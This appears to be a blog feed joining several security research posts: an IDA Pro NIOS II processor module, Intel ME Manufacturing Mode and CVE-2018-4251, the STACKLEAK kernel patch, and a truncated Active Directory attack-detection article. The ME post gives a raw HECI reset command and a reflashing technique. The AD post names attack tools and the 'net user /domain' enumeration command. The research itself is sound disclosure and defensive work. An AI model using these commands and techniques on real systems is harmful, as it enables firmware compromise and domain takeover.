Now there was a newer manual from Intel, which helped to make comparisons and check for bugs. I made big changes to the module, added numerous new features, and fixed some problems that had previously eluded solution. And of course, I added support for version 7 of IDA Pro. This is the result.

NIOS II programming model


NIOS II is an embedded processor developed for FPGAs from Altera (now a part of Intel). From a software standpoint, it has the following notable features: Little Endian byte order, 32-bit address space, 32-bit instruction set (meaning a fixed command length of 4 bytes), and 32 general-purpose registers and 32 special-purpose registers.

Disassembly and code references


So we open in IDA Pro a new file with firmware for the NIOS II processor. After installing the module, we see it in the list of IDA Pro processors. The list is shown in the following screenshot:


Let's say that the module does not yet support even basic parsing of commands. Since each command occupies 4 bytes, we place the bytes in groups of four, which resembles the following:


After we implement basic functionality to decode the instructions and operands, display them on screen, and analyze execution transfer instructions, the set of bytes from our above example turns into the following code:


As the example shows, cross-references with execution transfer commands are formed as well (in this particular case, we see a conditional jump and procedure call).

One useful thing we can implement in processor modules is comments for commands. If we disable display of byte values and enable comments instead, the same code will look as follows:



So if you are dealing with assembler code on an architecture that is new to you, comments can help you to get a feel for what is going on. The remaining code examples here will be given in the same way, with comments, so that you can concentrate on what is happening in the code instead of flipping through the NIOS II manual.

Pseudoinstructions and simplifying commands


Some NIOS II commands are pseudoinstructions. These commands do not have separate opcodes, and they themselves are modeled as special cases of other commands. During disassembly, instructions are simplified: in other words, certain combinations are replaced with pseudoinstructions. There are four types of NIOS II pseudoinstructions:


  • When the zero register (r0) is one of the sources and can be disregarded 
  • When a command has a negative value and the command is replaced with the opposite one
  • When a condition is replaced with the opposite one
  • When a 32-bit offset is moved in two commands (high and low halfword) and this is replaced with a single command


The first two types have been implemented, since replacing the condition does not change much. But 32-bit offsets are more diverse than described in the manual.

Let's see an example of the first type.



The zero register is used frequently in calculations, in our example. If we look closely, all commands (other than execution transfer commands) involve simply moving values to particular registers.

After pseudoinstruction handling has been applied, we get more readable code and instead of the OR and ADD commands, we get MOV instead.


Stack variables


NIOS II has stack support, and besides the stack pointer (sp) it also has a stack frame pointer (fp). Here is an example of a short procedure with use of a stack:


Space on the stack is reserved for local variables. Presumably, the ra register is saved in, and then restored from, a stack variable.

After we have added functionality to the module for monitoring stack pointer changes and creating stack variables, this is how the sample will look:


The code is easier to understand now, and we can name stack variables and study their purpose by referring to the cross-references. The __fastcall function in our example, as well as its arguments in the r4 and r5 registers, are moved to the stack to call a subprocedure with the _stdcall type.

32-bit numbers and offsets


During a single operation (=when performing one command), NIOS II can move a value of maximum size 2 bytes (16 bits) to a register. On the other hand, the processor registers and address space are 32-bit, meaning that 4 bytes are necessary for register addressing.

To overcome this, it is necessary to use offsets consisting of two parts. A similar mechanism is used on PowerPC processors: an offset consists of a high and low part and is moved to the register in two commands. This is how it works on PowerPC:


Cross-references are formed from both commands, although effectively it is the second command that sets the address. This can be inconvenient when trying to count the number of cross-references.

The non-standard type HIGHA16 is used in the properties of the offset for the high part, and sometimes the HIGH16 type is used; LOW16 is used for the low part.


Actually calculating 32-bit numbers from the two parts is not at all difficult. What's difficult is generating operands as the offsets for two separate commands. All of this processing is the job of the processor module. There were no existing examples of how to do this in the IDA SDK (and definitely not any written in Python).

In the PHDays talk, I mentioned offsets as an unresolved task. To solve this, we had to be clever: the 32-bit offset is taken only from the low halfword, relative to the base. The base is calculated as the high halfword shifted 16 bits to the left.


With this approach, a cross-reference is generated only for the command responsible for moving the low halfword of the 32-bit offset.

In the offset properties, we can see the base and property for treating the base address as a plain number, to avoid generating a large number of cross-references to the very same address that is serving as the base.


The NIOS II code contains the following mechanism for moving 32-bit numbers to a register: First, the high halfword of the offset is moved with the movhi command. Then it is joined by the low halfword. This can be accomplished in three different ways (commands): adding (addi), subtracting (subi), and with logical OR (ori).

For example, in the following code the registers are set to 32-bit numbers that are then moved to registers (arguments prior to calling a function):


After we have added offset calculations, we get the following representation of the code:



The resulting 32-bit offset is displayed next to the command for moving its low halfword. This example is rather striking and we could even mentally sum up all the 32-bit numbers with ease, simply by combining the high and low parts. Judging by the values, they are unlikely to be offsets.

Now we will look at a case when subtraction is used for moving a low halfword. Here we can no longer calculate the final 32-bit values (offsets) without effort.


After applying calculation of 32-bit numbers, it looks as follows:


Here we see that if an address is contained in the address space, an offset for it is generated, and the value formed by combining the high and low halfwords is no longer displayed next to it. Here we obtained the offset for the string "10/22/08". To make the final offsets point to valid addresses, we will increase the segment size slightly.


After enlarging the segment, we see that now all the calculated 32-bit numbers are offsets and point to valid addresses.

Earlier, I mentioned that we can also use the logical OR command to calculate offsets. The following code uses this approach to calculate two offsets:


The calculations from register r8 are then placed in the stack.

After conversion, we see that the registers are set to the start addresses of procedures: the procedure address is moved to the stack.


Reading and writing relative to base


So far, the 32-bit number being moved in two commands has been either a number or offset. In the next example, a base is moved to the high halfword of the register and then reading or writing is performed relative to it.


In this case, we get offsets for variables from the read and write commands themselves. Depending on the size of the operation, the size of the variable may be set as well.


Switch constructions


The switch constructions found in binary files can simplify analysis. For example, based on the number of options inside a switch construction, we can localize the switch responsible for handling a particular protocol or system of commands. This is why we want to recognize switch and its parameters. Take the following code:


After execution, it stops on the register jump jmp r2. This is followed by code referenced in the data; the end of each block of code contains a jump to the same label. Thus we can see that this is a switch construction, and that these blocks handle particular cases within it. Above we also see verification of the number of cases and a default jump.

After we add switch handling, the code looks as follows:



Now we clearly make out the jump, address of the table with offsets, number of cases, and each case with corresponding number.

The table with offsets is as follows: To save space, only the first five elements have been listed.


In essence, switch handling involves going through the code (starting with the tail end) and finding all of its components. So say that a particular switch organization scheme is being described. Sometimes schemes can contain exceptions. This is one reason why existing processor modules can fail to recognize seemingly obvious switches. In effect, the real-life switch simply doesn't fit the scheme defined inside the processor module. Or perhaps a scheme exists, but it contains other commands that are not part of the scheme, the locations of main commands have been switched, or the scheme is interrupted by jumps.

The NIOS II processor module recognizes a switch despite the presence of unrelated instructions between main commands, as well as a switch whose main commands have been switched places or one containing disruptive jumps. A reverse execution path approach is used that takes into account possible scheme-disrupting jumps, with setting of internal variables that signal various states of the recognizer. In total, there are approximately 10 different ways of organizing switch that are found in various firmware.

The custom instruction


The NIOS II has an interesting instruction by the name of custom. This instruction gives access to the 256 user-settable instructions supported on the NIOS II. In addition to general-purpose registers, the custom instruction can access a special set of 32 custom registers. After implementing logic for parsing the custom command, here is what we see:



Note that the two final instructions have the same instruction number and seem to perform the same actions.

The custom instruction is the subject of a separate manual. According to the manual, one of the most complete and modern custom instruction sets is the NIOS II Floating Point Hardware 2 Component (FPH2) set of instructions for floating-point computations. This is how our example looks after implementing FPH2 command parsing:


Based on the mnemonic of the two last commands, we indeed see that they perform the same action (the fadds command).

Jumping by register value


In firmware, we often see situations when a 32-bit offset (setting the jump location) is moved to a register and a jump is performed based on the register value.

Have a look at the code:


In the last line, there is a jump by register value. Before it, the address of the procedure (the one starting in the first line of the example) is moved to the register. The jump clearly is to the beginning of the procedure.

This is the result after adding functionality for jump recognition:


Next to the jmp r8 command is the address to which the jump is being made, if we were able to determine it. A cross-reference is also generated between the command and the address of the jump destination. The cross-reference is visible in the first line, while the jump itself occurs in the final line.

gp (global pointer) values: saving and loading


It is common to use a global pointer set to an address and then address variables relative to that pointer. In NIOS II, the gp register is used to store the global pointer. At a certain moment (most often during the firmware initialization procedures), an address value is moved to the gp register. The processor module handles this situation. To illustrate this, we have given examples of code and output from IDA Pro with debug messages enabled for the processor module.

In this case, the processor module finds and calculates the value of the gp register in the new base. When the idb base is closed, the value of gp is saved in the base.


When an existing idb base is loaded and the value of gp has already been found, the value is loaded form the base, as shown in the debug message in the following example:


Reading and writing relative to gp


Reading and writing with an offset relative to gp is a common occurrence. The following example includes three reads and one write of this type:


Since we have already obtained the address value, which is stored in the gp register, we can address these reads and writes.

Handling of gp-relative reading and writing makes things more convenient for us.


We can see which variables are being accessed, track their use, and determine their purpose.

Addressing relative to gp


The gp register can also be used for addressing variables.


For example, here we see that registers are set relative to gp to certain variables or data regions:

Once we drop in functionality to handle this situation by converting to offsets and adding cross-references, here is the result:


Now it is clear what is happening and we can identify the regions to which registers are being set relative to gp.

Addressing relative to sp


Similarly, registers in the next examples are set to certain memory regions, but this time relative to the stack pointer (sp).


As is visible, the registers are set to certain local variables. Such situations when arguments are set to local buffers before procedures calls are fairly common.

After adding handling for these situations (by converting the values to offsets), we obtain the following:


Now it is clear that after the procedure call, the values are loaded from the variables whose addresses were passed in parameters prior to the function call.

Cross-references from code to structure fields

Setting and using structures in IDA Pro can make code analysis more efficient.


We can see from the code that the field_8 field is incremented and perhaps used as a counter for triggering an event. If the read and write fields are far away from each other in the code, cross-references might be useful.

Let's look at the structure:


Structure fields are accessed, but cross-references from the code to structure elements were not formed.

After these situations are handled, this is how it will all look in our case:


Now there are cross-references to structure fields from the specific commands involving those fields. Direct and reverse cross-references are present as well. And based on various procedures, we can see where the field values are read or written.

Where the manual and reality diverge


According to the manual, during decoding of some commands, certain bits are supposed to take only strictly defined values. For example, for the eret command for returning from an exception, bits 22–26 should equal 0x1E.


Here is a command example from firmware:


When we open different firmware in a place with similar context, something different happens:


These bytes were not automatically converted to a command, although all the commands can be handled. Judging by the context (and even similar address), this should be the same command. But take a close look at the bytes. This is the eret command, except that bits 22–26 equal zero instead of equaling 0x1E.

So we have to slightly tweak the parsing results for the command: although it doesn't exactly correspond to the manual anymore, it does match the reality.


IDA 7 support


The API provided by IDA Python for ordinary scripts has changed considerably as of IDA version 7.0. For processor modules, the changes are massive. Nonetheless, we succeeded in reworking the NIOS II processor module for version 7.


There is one strange thing: when a new binary file for NIOS II is loaded in IDA 7, analysis does not start automatically, unlike in IDA 6.9.

Conclusion


The SDK contains examples in which a processor module, besides having basic disassembler functionality, supports numerous features that make it easier to pick apart code. Certainly this all could be done by hand, but say that you have a binary file with megabytes of firmware containing tens of thousands of offsets of various types—why waste so much time if there is a more efficient way? A well-implemented processor module can perform this task instead. And cruising through code with the help of cross-references can be downright fun! With these abilities, IDA remains the convenient and helpful tool beloved by so many.

Author: Anton Dorfman, Positive Technologies

Intel ME Manufacturing Mode: obscured dangers and their relationship to Apple MacBook vulnerability CVE-2018-4251

$
0
0

The weakness of "security through obscurity" is so well known as to be obvious. Yet major hardware manufacturers, citing the need to protect intellectual property, often require a non-disclosure agreement (NDA) before allowing access to technical documentation. The situation has become even more difficult with the growing intricacy of chip designs and integration of proprietary firmware. Such obstacles make it nearly impossible for independent researchers to analyze the security of these platforms. As a result, both ordinary users and hardware manufacturers lose out.

One example is Intel Management Engine (Intel ME), including its server (Intel SPS) and mobile (Intel TXE) versions (for background on Intel ME, we recommend consulting  [5] and [6]). In this article, we will describe how undocumented commands (although "undocumented" applies to practically everything about Intel ME) enable overwriting SPI flash memory and implementing the doomsday scenario: local exploitation of an ME vulnerability (INTEL-SA-00086). At the root of this problem is an undocumented Intel ME mode, specifically, Manufacturing Mode.

What is Manufacturing Mode?

Intel ME Manufacturing Mode is intended for configuration and testing of the end platform during manufacturing, and as such should be disabled (closed) before sale and shipment to users. However, this mode and its potential risks are not described anywhere in Intel's public documentation. Ordinary users do not have the ability to disable this mode, since the relevant utility (part of Intel ME System Tools) is not officially available. As a result, there is no software that can protect, or even notify, the user if this mode is enabled for whatever reason. Even Chipsec [2], a utility specially designed to identify configuration errors in the chipset and CPU at the level of UEFI firmware (such as incorrect configuration of access rights for SPI flash regions), does not know anything about Intel Manufacturing Mode.

This mode allows configuring critical platform settings stored in one-time-programmable memory (FUSEs). These settings include those for BootGuard (the mode, policy, and hash for the digital signing key for the ACM and UEFI modules). Some of them are referred to as FPFs (Field Programmable Fuses). For a list of FPFs that can be written to FUSEs (a list that is incomplete, since a number of FPFs cannot be set directly), you can use the FPT (Flash Programming Tool) utility from Intel ME System Tools.

Figure 1. Output of the -FPFs option in FPT
FPFs account for only a part of the FUSE array: instead, most are used by Intel to store platform parameters. Part of this space is called IP FUSEs, used to store the settings of IP (Intelligent Property, hardware logic blocks) units. Thus, the DFx Aggregator special device stores in FUSEs a sign of whether the platform is for testing or mass production.

In addition to FPFs, in Manufacturing Mode the hardware manufacturer can specify settings for Intel ME, which are stored in the Intel ME internal file system (MFS) on SPI flash memory. These parameters can be changed by reprogramming the SPI flash. The parameters are known as CVARs (Configurable NVARs, Named Variables).

Setting CVARs is the responsibility of the Intel ME module named mca_server. MCA is short for "Manufacture-Line Configuration Architecture," which is the general name for the process of configuring the platform during manufacturing. CVARs, just like FPFs, can be set and read via FPT.

Figure 2. List of CVARs output by FPT for the Broxton P platform
The list of CVARs depends on the platform and version of Intel ME. For chipsets supporting Intel AMT, one of the CVARs is the password for entering MEBx (ME BIOS Extension).

Setting FPFs, or almost any CVARs, requires that Intel ME be in Manufacturing Mode. The process of assigning FPFs consists of two steps: setting the values for FPFs (which are saved to temporary memory) and committing the FPF values to the FUSEs. The first step is possible only in Manufacturing Mode, but the actual "burn" occurs automatically after Manufacturing Mode is closed if, while in that mode, the manufacturer set FPF values and the corresponding range in the FUSE array has never been written to before. So, if a system is in Manufacturing Mode, the FPFs have likely never been initialized.

A sign of Manufacturing Mode having been closed is stored in the file /home/mca/eom on MFS. When the SPI flash is overwritten by firmware with the basic file system (just after build by FIT [9]), the platform can once again function in Manufacturing Mode, although overwriting FUSEs is no longer possible.

OEM public key

Accordingly, the procedure for configuring Intel platforms is rather complicated and consists of multiple steps. Any error or deviation from this procedure by hardware manufacturers places the platform at serious risk. Even if Manufacturing Mode has been closed, a manufacturer may not have set FPFs, which allows attackers to do so themselves by writing their own values for example instead of the key for signing the start code of the BootGuard (AСM) and UEFI modules. In this case, the platform would load only with the attacker's malicious code—and persistently so. This would lead to irreversible hardware compromise, since the attacker's key is written to permanent memory, from which it can never be removed (for details of this attack, see "Safeguarding rootkits: Intel BootGuard" by Alexander Ermolov [8]).

On newer systems (Apollo Lake, Gemini Lake, Cannon Point) FPFs store not just the key for BootGuard, but the OEM's public key (strictly speaking, the SHA256 hash for the RSA OEM public key), which underpins several ME security mechanisms. For example, the special section of SPI flash named Signed Master Image Profile (SMIP) stores manufacturer-specified PCH Straps (PCH hardware configuration). This section is signed using a key whose SHA256 hash is stored in a special file (partition) on SPI flash. This file name is oem.key in the FTPR partition (OEMP.man in OEMP partition for Cannon Point PCH) and contains various OEM-provided public keys for signing all sorts of data. In the following figure, you can see a full list of the sets of data signed by the manufacturer, each with a unique key, for the Cannon Point platform:

Figure 3. List of OEM-signed data for the CNP platform
The oem.key file itself is signed with an OEM root key, whose public key’s hash should be written in the FPFs.

Figure 4. OEM signing
Therefore, having compromised the OEM root key, an attacker can compromise all previously mentioned data, which is much worse than the Boot Guard–only takeover possible on older platforms.

Bypassing block on writing to the ME region

Until recently (prior to Intel Apollo Lake), Intel ME was located in a separate SPI region that had independent access rights for the CPU, GBE, and ME. So as long as access attributes were correctly configured, it was impossible to read or write to ME from the CPU (main system) side. However, current SPI controllers for Intel chipsets have a special mechanism called Master Grant. This mechanism assigns a strictly defined portion of SPI flash to each SPI master. A master controls its particular region, regardless of the access rights indicated in the SPI descriptor. Each master can provide access (read or write) for its region (but only its own region!) to any other master it wishes.

                             Figure 5. Excerpt from Intel documentation describing SPI Master Grant
What this means is that even if the SPI descriptor forbids host access to an SPI region of ME, it is possible for ME to still provide access. In our view, this change was likely intended to enable updating Intel ME in a way that bypasses the standard process.

Host ME Region Flash Protection Override

Intel ME implements a special HECI command that allows opening write access to ME SPI region on the CPU side. The command is called HMR FPO (Host ME Region Flash Protection Override). We have detailed this command at length previously [5]. There are some things worth knowing about it.

After receiving the HMR FPO command, Intel ME opens access to the region only after a reset. Intel МЕ itself also includes security measures: the command is accepted only when the UEFI BIOS is owner of the platform boot process, prior to End Of Post (EOP). EOP is a different HECI command that sends the UEFI to ME before handing off control to the operating system (ExitBootServices). Sometimes, BIOS Setup contains an option for sending the HMRFPO command prior to EOP.

Figure 6. Opening the ME region in the BIOS
After receiving EOP, Intel ME ignores HMR FPO and returns the corresponding error status. But this occurs only after Manufacturing Mode has been closed. Therefore, in Manufacturing Mode, Intel ME accepts HMR FPO at any time, regardless of the presence (or absence) of End Of Post. If the manufacturer has failed to close Manufacturing Mode, an attacker can alter Intel ME at any time (of course, administrator rights are needed, but even the OS kernel initially cannot re-flash Intel ME). At this stage, the attacker can re-flash the ME image, such as to exploit vulnerability INTEL-SA-00086. A reset is then needed to run the modified firmware, but this is no problem on nearly any platform, with the exception of the Apple MacBook. Apple's computers contain an additional check in the UEFI, which runs when the UEFI is launched and blocks startup of the system if the ME region has been opened with HMRFPO. However, as we will show here, this mechanism can be easily bypassed if Intel ME is in Manufacturing Mode.

Resetting ME without resetting the main CPU

Today's computers can be restarted in several different ways: the documented versions include a global reset and reset of the main CPU only (without resetting ME). But, if there is a way to reset ME without resetting the main CPU (by running the HMRFPO command in advance as well), access to the region opens up and the main system continues to function.

Figure 7. Reset types

Having investigated the internal ME modules, we discovered that there is a HECI command ("80 06 00 07 00 00 0b 00 00 00 03 00", see more about sending commands in [5]) for a reset of only (!!!) Intel ME. In Manufacturing Mode, this command can be sent at any time, even after EOP:

Figure 8. Disassembler listing for the function responsible for handling HECI ME reset commands
Therefore, an attacker who sends these two HECI commands opens the ME region and can write arbitrary data there, without having to reset the platform as a whole. And it doesn't even matter what the SPI descriptor contains—correctly set protection attributes for SPI regions will not protect ME from modifications if the system is running in Manufacturing Mode.

Exploitation case: vulnerability CVE-2018-4251

We analyzed several platforms from a number of manufacturers, including Lenovo and Apple MacBook Prо laptops. The Yoga and ThinkPad computers we examined did NOT have any issues related to Manufacturing Mode. But we found that Apple laptops on Intel chipsets are running in Manufacturing Mode. After this information was reported to Apple, the vulnerability (CVE-2018-4251) was patched in macOS High Sierra update 10.13.5.

Local exploitation of INTEL-SA-00086

By exploiting CVE-2018-4251, an attacker could write old versions of Intel ME (such as versions containing vulnerability INTEL-SA-00086) to memory without needing an SPI programmer or access to the HDA_SDO bridge—in other words, without physical access to the computer. Thus, a local vector is possible for exploitation of INTEL-SA-00086, which enables running arbitrary code in ME.
Notably, in the notes for the INTEL-SA-00086 security bulletin, Intel does not mention enabled Manufacturing Mode as a method for local exploitation in the absence of physical access. Instead, the company incorrectly claims that local exploitation is possible only if access settings for SPI regions have been misconfigured. So to keep users safe, we decided to describe how to check the status of Manufacturing Mode and how to disable it.

What can users do?

Intel System Tools includes MEInfo (and, for mobile and server platforms respectively, TXEInfo and SPSInfo) in order to allow obtaining thorough diagnostic information about the current state of ME and the platform overall. We demonstrated this utility in previous research about the undocumented HAP (High Assurance Platform) mode and how to disable ME [6]. The utility, when called with the -FWSTS flag, displays a detailed description of status HECI registers and the current status of Manufacturing Mode (when the fourth bit of the FWSTS status register is set, Manufacturing Mode is active).

Figure 9. Example of MEInfo output
We also created a program [7] for checking the status of Manufacturing Mode if the user for whatever reason does not have access to Intel ME System Tools. Here is what the script shows on affected systems:

Figure 10. mmdetect script
So one logical question is, how can users close Manufacturing Mode themselves if the manufacturer has failed to do so? To disable Manufacturing Mode, FPT has a special option (-CLOSEMNF) that in addition to its main purpose also allows setting the recommended access rights for SPI flash regions in the descriptor.

Here is what happens when we enter -CLOSEMNF:

Figure 11. Process of closing Manufacturing Mode with FPT

In this example, we used the NO parameter for -CLOSEMNF to avoid resetting the platform, as would otherwise happen by default immediately after closing Manufacturing Mode.

Conclusion

Our research shows that Intel ME has a Manufacturing Mode problem, and that even giant manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Worse still, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even "bricking" of hardware.
We also suspect that the ability to reset ME without resetting the main CPU may lead to yet additional security issues, due to the states of the BIOS/UEFI and ME falling out of sync.

[1] Intel Management Engine Critical Firmware Update, Intel-SA-00086
[2] GitHub - chipsec/chipsec: Platform Security Assessment Framework
[4] Fast, secure and flexible OpenSource firmware, Coreboot
[5] Mark Ermolov, Maxim Goryachy, How to Become the Sole Owner of Your PC, PHDays VI, 2016
[6] Mark Ermolov, Maxim Goryachy, Disabling Intel ME 11 via undocumented mode, Positive Technologies blog
[7] Intel ME Manufacturing Mode Detection Tools
[8] Safeguarding rootkits: Intel BootGuard, Alexander Ermolov
[9] Dmitry Sklyarov. Intel ME: Flash File System. Explained

Authors: Maxim Goryachy, Mark Ermolov

How STACKLEAK improves Linux kernel security

$
0
0



STACKLEAK is a Linux kernel security feature initially developed by Grsecurity/PaX. I'm working on introducing STACKLEAK into the Linux kernel mainline. This article describes the inner workings of this security feature and why the vanilla kernel needs it.

In short, STACKLEAK is needed because it mitigates several types of Linux kernel vulnerabilities, by:

  •  Reducing the information that can be revealed to an attacker by kernel stack leak bugs,
  •  Blocking some uninitialized stack variable attacks,
  •  Detecting kernel stack overflow during Stack Clash attack against Linux Kernel.

This security feature fits the mission of the Kernel Self Protection Project (KSPP): security is more than just fixing bugs. Fixing absolutely all bugs is impossible, which is why the Linux kernel has to fail safely in case of an error or vulnerability exploitation. More details about KSPP are available on its wiki.

STACKLEAK was initially developed by the PaX Team, going as PAX_MEMORY_STACKLEAK in the Grsecurity/PaX patch. But this patch is no longer freely available to the Linux kernel community. So I took its last public version for the 4.9 kernel (April 2017) and got to work. The plan has been as follows:

  • First extract STACKLEAK from the Grsecurity/PaX patch.
  • Then carefully study the code and create a new patch.
  • Send the result to the Linux kernel mailing list (LKML), get feedback, make improvements, and repeat until the code is accepted into the mainline.

As of October 9, 2018, the 15th version of the STACKLEAK patch series has been submitted. It contains the common code and x86_64/x86_32 support. The arm64 support developed by Laura Abbott from Red Hat has already been merged into mainline kernel v4.19.


Security features


Most importantly, STACKLEAK erases the kernel stack at the end of syscalls. This reduces the information that can be revealed through some kernel stack leak bugs. An example of such an information leak is shown in Figure 1.

Figure 1. Kernel stack leak exploitation, pre-STACKLEAK
However, these leaks become useless for the attacker if the used part of the kernel stack is filled by some fixed value at the end of a syscall (Figure 2).

Figure 2. Kernel stack leak exploitation, post-STACKLEAK
Hence, STACKLEAK blocks exploitation of some uninitialized kernel stack variable vulnerabilities, such as CVE-2010-2963 and CVE-2017-17712. For a description of exploitation of vulnerability CVE-2010-2963, refer to the article by Kees Cook.

Figure 3 illustrates an attack on an uninitialized kernel stack variable.

Figure 3. Uninitialized kernel stack variable exploitation, pre-STACKLEAK
STACKLEAK mitigates this type of attack because at the end of a syscall, it fills the kernel stack with a value that points to an unused hole in the virtual memory map (Figure 4).

Figure 4. Uninitialized kernel stack variable exploitation, post-STACKLEAK

There is an important limitation: STACKLEAK does not help against similar attacks performed during a single syscall.

Runtime detection of kernel stack depth overflow


In the mainline kernel, STACKLEAK would be effective against kernel stack depth overflow only in combination with CONFIG_THREAD_INFO_IN_TASK and CONFIG_VMAP_STACK (both introduced by Andy Lutomirski).

The simplest type of stack depth overflow exploit is shown in Figure 5.

Figure 5. Stack depth overflow exploitation: mitigation with CONFIG_THREAD_INFO_IN_TASK
Overwriting the thread_info structure at the bottom of the kernel stack allows an attacker to escalate privileges on the system. However, CONFIG_THREAD_INFO_IN_TASK moves thread_info out of the thread stack and therefore mitigates such an attack.

There is a more complex variant of the attack: make the kernel stack grow beyond  the end of the kernel's preallocated stack space and overwrite security-sensitive data in a neighboring memory region (Figure 6). More technical details are available in:


Figure 6. Stack depth overflow exploitation: a more complicated version

CONFIG_VMAP_STACK protects against such attacks by placing a special guard page next to the kernel stack (Figure 7). If accessed, the guard page triggers an exception.

Figure 7. Stack depth overflow exploitation: mitigation with guard pages
Finally, the most interesting version of a stack depth overflow attack is a Stack Clash (Figure 8). Gael Delalleau published this idea in 2005. It was later revisited by the Qualys Research Team in 2017. In essence, it is possible to jump over a guard page and overwrite data from a neighboring memory region using Variable Length Arrays (VLA).


Figure 8. Stack Clash attack
STACKLEAK mitigates Stack Clash attacks against the kernel stack. More information about STACKLEAK and Stack Clash is available on the grsecurity blog.

To prevent a Stack Clash in the kernel stack, a stack depth overflow check is performed before each alloca() call. This is the code from v14 of the patch series:

void __used stackleak_check_alloca(unsigned long size)
{
       unsigned long sp = (unsigned long)&sp;
       struct stack_info stack_info = {0};
       unsigned long visit_mask = 0;
       unsigned long stack_left;

       BUG_ON(get_stack_info(&sp, current, &stack_info, &visit_mask));

       stack_left = sp - (unsigned long)stack_info.begin;

       if (size >= stack_left) {
               /*
                * Kernel stack depth overflow is detected, let's report that.
                * If CONFIG_VMAP_STACK is enabled, we can safely use BUG().
                * If CONFIG_VMAP_STACK is disabled, BUG() handling can corrupt
                * the neighbour memory. CONFIG_SCHED_STACK_END_CHECK calls
                * panic() in a similar situation, so let's do the same if that
                * option is on. Otherwise just use BUG() and hope for the best.
                */
#if !defined(CONFIG_VMAP_STACK) && defined(CONFIG_SCHED_STACK_END_CHECK)
               panic("alloca() over the kernel stack boundary\n");
#else
               BUG();
#endif
       }
}

However, this functionality was excluded from the 15th version of the STACKLEAK patch series. The main reason is that Linus Torvalds has forbidden use of BUG_ON() in kernel hardening patches. Moreover, during discussion of the 9th version, the maintainers decided to remove all VLAs from the mainline kernel. There are 15 kernel developers participating in that work, which will be finished soon.

Performance impact


Cursory performance testing was performed on x86_64 hardware: Intel Core i7-4770, 16 GB RAM.

Test 1, looking good: compiling the Linux kernel on one CPU core.

    # time make
    Result on 4.18:
        real 12m14.124s
        user 11m17.565s
        sys 1m6.943s
    Result on 4 .18+stackleak:
        real 12m20.335s (+0.85%)
        user 11m23.283s
        sys 1m8.221s

Test 2, not so hot:

    # hackbench -s 4096 -l 2000 -g 15 -f 25 –P
    Average on 4.18: 9.08 s
    Average on 4.18+stackleak: 9.47 s (+4.3%)

In summary: the performance penalty varies for different workloads. Test STACKLEAK on your expected workload before deploying it in production.

Inner workings


STACKLEAK consists of:

  • The code that erases the kernel stack at the end of syscalls,
  • The GCC plugin for kernel compile-time instrumentation.

Erasing the kernel stack is performed in the stackleak_erase() function. This function runs before returning from a syscall to userspace and writes STACKLEAK_POISON (-0xBEEF) to the used part of the thread stack (Figure 10). For speed, stackleak_erase() uses the lowest_stack variable as a starting point (Figure 9). This variable is regularly updated in stackleak_track_stack() during system calls.

Figure 9. Erasing the kernel stack with stackleak_erase()
Figure 10. Erasing the kernel stack with stackleak_erase(), continued
Kernel compile-time instrumentation is handled by the STACKLEAK GCC plugin. GCC plugins are compiler-loadable modules that can be project-specific. They register new compilation passes via the GCC Pass Manager and provide the callbacks for these passes.

So the STACKLEAK GCC plugin inserts the aforementioned stackleak_track_stack() calls for the functions with a large stack frame. It also inserts the stackleak_check_alloca() call before alloca and the stackleak_track_stack() call after it.

As I already mentioned, inserting stackleak_check_alloca() was dropped in the 15th version of the STACKLEAK patch series.

The way to the mainline


The path of STACKLEAK to the Linux kernel mainline is very long and complicated (Figure 11).

Figure 11. The way to the mainline
In April 2017, the authors of grsecurity made their patches commercial. In May 2017, I decided to work on upstreaming STACKLEAK. It was the beginning of a very long story. My employer Positive Technologies allows me to spend a part of my working time on this task, although I mainly spend my free time on it.

As of October 9, 2018, the 15th version of the STACKLEAK patch series is contained in the linux-next branch. It fits Linus' requirements and is ready for the merge window of the 4.20/5.0 kernel release.

Conclusion


STACKLEAK is a very useful Linux kernel self-protection feature that mitigates several types of vulnerabilities. Moreover, the PaX Team has made it rather fast and technically beautiful. Considering the substantial work done in this direction, upstreaming STACKLEAK would benefit Linux users with high information security requirements and also focus the attention of the Linux developer community on kernel self-protection.

Author: Alexander Popov, Positive Technologies


Advanced attacks on Microsoft Active Directory: detection and mitigation

$
0
0
Attacks on Microsoft Active Directory have been a recurrent topic of reports on Black Hat and Defcon during the last four years. Speakers tell about new vectors, share their inventions, and give recommendations on detection and avoidance of these vectors. I believe that the IT department is capable of creating a secure infrastructure, which can be monitored by the security department. High-quality monitoring, in its turn, requires good tools. That's like a military base: you have erected guard towers around the perimeter but still keep watch over the area.

Six strategies that would not be overlooked

Numerous vendors provide security software that supports monitoring of the following malicious activities:

Pass-the-Hash

This attack is conditioned by architecture of NTLM, an authentication protocol created by Microsoft in 1990s. Logging in to a remote host requires password hash stored on the computer that is used for the authentication process. Therefore, the hash can be extracted from that computer.

Mimikatz

To achieve that, a French researcher Benjamin Delpy developed in 2014 Mimikatz, the utility that allows dumping cleartext passwords and NTLM hashes from the computer memory.

Brute Force

If credentials extracted from one host are not enough, the attacker can opt for a rough but effective technique of guessing the password.

net user /domain

Where do we take a username dictionary to conduct this attack? Any domain member is allowed to execute the net user /domain command that returns a full list of AD domain users.

Kerberoasting

If a domain uses Kerberos as the authentication protocol, an attacker can try a Kerberoasting attack. Any user authenticated on the domain can request a Kerberos ticket for access to the service (Ticket Granting Service). TGS is encrypted with the password hash of the account used to run the service. The attacker who requested the TGS can now bruteforce it offline without any fear of being blocked. In case of success, the attacker gains the password to the account associated with the service, usually a privileged one.

PsExec

As soon as the attacker obtains the required credentials, the next task is remote command execution. This task can be easily solved using the PsExec utility from the Sysinternals set, which proved remarkably effective and is appreciated by both IT administrators and hackers.

Seven spells of hackers

Now we are going to review seven spells of hackers that can help to gain full control over Active Directory.

[The figure shows four steps of the attack. Each step features a set of methods]


Let's start with reconnaissance.

PowerView

PowerView is a part of PowerSploit, a well-known PowerShell framework for penetration testing. PowerView supports Bloodhound, the tool that gives graph representation of object connections in AD.


Graph representation of relationships between Active Directory objects
Bloodhound immediately provides such possibilities as:

  • Finding accounts of all domain administrators
  • Finding hosts, on which domain administrators are logged
  • Finding the shortest path from the attacker's host to the host with the domain admin session

The last possibility replies to the question, what hosts need to be hacked to get to the domain admin account. This approach significantly reduces the time required for gaining full control over the domain.

The difference between PowerView and built-in utilities that allow obtaining data on AD objects (such as net.exe) is that PowerView uses LDAP, not SAMR. To detect this activity, we can use domain controller event 1644. Logging of this event is enabled by adding the relevant value in the register:

